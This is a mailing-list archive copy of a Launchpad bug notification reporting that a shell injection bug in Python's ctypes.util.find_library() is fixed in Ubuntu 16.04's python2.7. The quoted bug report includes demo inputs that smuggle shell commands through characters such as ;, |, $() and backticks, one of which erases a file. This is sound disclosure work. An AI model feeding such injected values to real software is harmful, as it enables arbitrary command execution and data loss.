group.of.nepali.translators team mailing list archive

Thread
Date

[Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

To: group.of.nepali.translators@xxxxxxxxxxxxxxxxxxx
From: Launchpad Bug Tracker <1512068@xxxxxxxxxxxxxxxxxx>
Date: Thu, 18 Jan 2018 09:03:19 -0000
Reply-to: Bug 1512068 <1512068@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

This bug was fixed in the package python2.7 - 2.7.12-1ubuntu0~16.04.3

---------------
python2.7 (2.7.12-1ubuntu0~16.04.3) xenial-proposed; urgency=medium

  * Some performance improvements: LP: #1638695.
    - Build the _math.o object file without -fPIC for static builds.
  * Rename md5_* functions to _Py_md5_*. Closes: #868366. LP: #1734109.
  * Explicitly use the system python for byte compilation in postinst scripts.
    LP: #1682934.
  * Fix issue #22636: Avoid shell injection problems with
    ctypes.util.find_library(). LP: #1512068.

 -- Matthias Klose <doko@xxxxxxxxxx>  Mon, 04 Dec 2017 15:50:18 +0100

** Changed in: python2.7 (Ubuntu Xenial)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  Fix Released

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ are in the name.
  The "os.popen()" calls in the util.py script should be replaced with "subprocess.Popen()".

  Demo Exploits for Linux :
  ====================

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")                    # runs  xeyes 
  >>> find_library("|xterm")                    # runs terminal
  >>> find_library("&gimp")                    # runs gimp
  >>> find_library("$(nautilus)")              # runs filemanager
  >>> find_library(">test")                       # creates, and if exists, erases a file "test"

  ==== Traceback ====

  >>> find_library("`xmessage hello`")    # shows a message, press ctrl+c for Traceback
  ^CTraceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
      return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
    File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
      trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions